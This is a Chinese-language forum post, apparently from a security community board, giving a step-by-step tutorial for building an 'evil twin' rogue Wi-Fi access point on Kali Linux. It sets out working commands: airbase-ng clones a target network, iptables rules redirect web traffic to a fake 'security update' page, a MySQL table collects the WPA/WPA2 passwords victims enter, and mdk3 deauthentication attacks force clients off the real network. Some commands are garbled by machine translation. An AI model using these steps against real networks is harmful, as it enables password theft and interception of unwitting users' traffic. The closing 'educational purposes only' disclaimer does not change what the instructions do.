找回密码
 注册帐号
查看: 811|回复: 0

如何创建邪恶的双重访问点

[复制链接]

1400

主题

46

回帖

6880

积分

版主

发表于 2017-5-27 22:46:35 | 显示全部楼层 |阅读模式

马上注册,结交更多好友,享用更多功能,让你轻松玩转社区。

您需要 登录 才可以下载或查看,没有账号?注册帐号

×
今天我们将学习如何创建邪恶的双重访问点。

要求:
卡利Linux
2.无线网卡适配器[使用TP-link TL-WN821N]
互联网连接到您的机器
4.目标接入点
什么是邪恶的双子座?
一个邪恶的双胞胎,在安全的情况下,是一个流氓无线接入点,伪装成Wi-Fi接入点,以便攻击者可以在用户不知情的情况下收集个人信息。
对于用户来说,邪恶的双胞胎看起来像一个有强烈信号的热点; 这是因为攻击者不仅使用了与他冒充的“好双胞胎”相同的网络名称和设置,他还将自己的身体定位在终端用户附近,以便他的信号可能是范围内最强的。
如果终端用户受到强信号的诱惑,并手动连接到邪恶的双胞胎访问互联网,或者如果用户的计算机由于以混杂模式运行而自动选择该连接,那么恶双孪生就成为用户的互联网接入点,使攻击者能够拦截敏感数据,如密码。
所以让我们开始创建一个邪恶的双接入点的教程
一步一步如何创建邪恶的双重访问点
步骤1:
登录到你的kali linux机器..
建立一个互联网连接到你的主机..
现在我们必须安装DHCP服务器如下。
打开终端 ,键入apt-get install dhcp3-server ,如下所示:
在上面的截图我已经安装了dhcp服务器..
第2步:
现在我们需要配置我们的DHCP服务器如下。
打开您的终端并键入nano / etc / dhcpd.conf ,您的终端上应该打开一个空白文件。
现在在下面的屏幕截图中输入以下内容
键入后按ctrl + x ,然后按y ,然后 Enter键保存。
步骤3:
现在下载客户端打开网页浏览器时会看到的安全更新页面。
要做到这一点,
导航到您的终端中的cd / var / www ,执行如下操作:
rm index.html
解压缩eviltwin.zip
rm eviltwin.zip
步骤4:
现在键入以下内容启动您的apache服务器和mysql:
/etc/init.d/apache2开始
/etc/init.d/mysql启动
现在mysql加载了,我们必须创建一个数据库,我们存储客户端进入安全更新页面的WPA / WPA2密码。
键入以下内容:
mysql -u root
创建数据库evil_twin;
使用evil_twin
创建表wpa_keys(密码varchar(64),确认varchar(64));
在上面的截图中,数据库已经存在..
离开mysql终端打开..
步骤5:
现在我们需要找到我们的本地网络适配器接口名称和本地ip
现在打开新终端并输入:
ip路由 (注意本地ip n有线接口)
airmon-NG
airmon-ng start wlan0
明确
注意: eth0是我的接口名称, 192.168.0.105是我的本地ip
airodump中-NG-OUI更新
airodump-ng -M mon0(注意目标essid,bssid和频道号)
airbase-ng -e [ESSID] -c [ch。 #] -P mon0
注意:[ESSID]是您的目标ESSID和[ch。 #]针对频道号码。
步骤6:
我们的邪恶的双接入点现在正在运行,我们需要配置我们的隧道接口,以便我们可以在我们的邪恶的双接入点和我们的有线接口之间建立桥梁,我们的隧道接口被命名为0 ,这是在我们创建邪恶的双胞胎时创建的接入点使用airbase ..
不要关闭airbase和mysql终端
现在打开一个新终端,键入如下:
ifconfig at0 192.168.1.129 netmask 255.255.255.128
现在我们需要添加一个路由表来启用IP转发,所以我们可以从我们的恶性双接入点转发流量。
因此,键入以下内容:
route add -net 192.168.1.128 netmask 255.255.255.128 gw 192.168.1.129
echo 1> / proc / sys / net / ipv4 / ip_forward
iptables -table nat -append POSTROUTING -out-interface eth0 -j MASQUERADE
iptables -append FORWARD -in-interface at0 -j ACCEPT
iptables -t nat -A PREROUTING -p tcp -dport 80 -j DNAT到目的地[LOCALIP ADDRESS:80]
iptables -t nat -A POSTROUTING -j MASQUERADE
dhcpd -cf /etc/dhcpd.conf -pf /var/run/dhcpd.pid at0
etc / init.d / isc-dhcp-server启动
步骤7:
现在我们需要强制我们的客户连接到我们的邪恶的双接入点,并完成这一点,我们需要通过执行去认证攻击来断开客户端。 要做到这一点,我们需要创建包含目标的BSSID的黑名单文件
做如下:
回音[BSSID]>黑名单
注意:[BSSID]目标的BSSID
mdk3 mon0 d -b blacklist -c [CH。#]
现在回到airbase终端,检查是否有任何客户端连接到您的恶意双接入点..
如果他连接到邪恶的双接入点,他将看到如下所示的安全页面,要求密码。
客户端进入WPA / WPA2密码并单击更新。
现在转到mysql终端并输入
使用evil_twin
从wpa_keys中选择* {查看受害者在我们的mysql数据库中输入的密码}
就这样,这就是你创造一个邪恶的双重接入点。
教程仅用于教育目的!
希望你觉得有用

哎...今天够累的,签到来了1...
您需要登录后才可以回帖 登录 | 注册帐号

本版积分规则

Archiver|sitemap|小黑屋|手机版原版|安全之家

GMT+8, 2025-4-11 05:35 , Processed in 0.217839 second(s), 6 queries , Gzip On, Redis On.

Powered by Discuz! X3.5

© 2001-2025 Discuz! Team.

快速回复 返回顶部 返回列表